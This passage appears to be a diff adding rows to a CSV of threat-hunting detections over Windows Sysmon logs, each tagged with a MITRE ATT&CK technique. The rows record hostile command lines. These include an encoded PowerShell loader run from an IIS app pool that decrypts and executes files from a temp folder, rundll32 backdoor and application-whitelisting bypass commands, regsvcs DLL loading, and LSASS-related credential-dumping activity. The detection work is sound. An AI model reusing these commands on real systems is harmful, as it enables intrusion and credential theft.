wBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-3251-5CEB-0000-00109E06E100
+ 748
+ C:\Windows\System32\inetsrv\w3wp.exe
+ c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243544
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.077
+ 747F3D96-9F69-5E75-0000-0010476F2000
+ 7836
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16507
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:09:02.275
+ 365ABB72-532E-5CD8-0000-00106C222700
+ 1528
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-516B-5CD8-0000-001087E41600
+ 3788
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 20
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:13.560
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\hid.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Hid User Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5875
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:28:42.700
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-3251-5CEB-0000-00109E06E100
+ 748
+ C:\Windows\System32\inetsrv\w3wp.exe
+ c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243544
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.077
+ 747F3D96-9F69-5E75-0000-0010476F2000
+ 7836
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16507
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:09:02.275
+ 365ABB72-532E-5CD8-0000-00106C222700
+ 1528
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-516B-5CD8-0000-001087E41600
+ 3788
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243544
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.077
+ 747F3D96-9F69-5E75-0000-0010476F2000
+ 7836
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16507
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:09:02.275
+ 365ABB72-532E-5CD8-0000-00106C222700
+ 1528
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-516B-5CD8-0000-001087E41600
+ 3788
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4920
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:28.893
+ 747F3D96-6628-5D3F-0000-0010349B8800
+ 6552
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 19
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:13.309
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\samlib.dll
+ 6.1.7601.23677 (win7sp1_ldr.170209-0600)
+ SAM Library DLL
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 19
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:13.309
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\samlib.dll
+ 6.1.7601.23677 (win7sp1_ldr.170209-0600)
+ SAM Library DLL
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6594
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1059,technique_name=Command-Line Interface
+ 2019-04-27 15:57:53.806
+ 365ABB72-7C01-5CC4-0000-00105C5C0C00
+ 3076
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /A
+ C:\Users\IEUser\AppData\Roaming\
+ IEWIN7\IEUser
+ 365ABB72-7AB1-5CC4-0000-0020BEF40000
+ 0xf4be
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-7C01-5CC4-0000-0010F9530C00
+ 2992
+ C:\Users\IEUser\AppData\Roaming\NvSmart.exe
+ "C:\Users\IEUser\AppData\Roaming\NvSmart.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5925
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.392
+ 365ABB72-3D6E-5CEB-0000-00100C96FF00
+ 3136
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
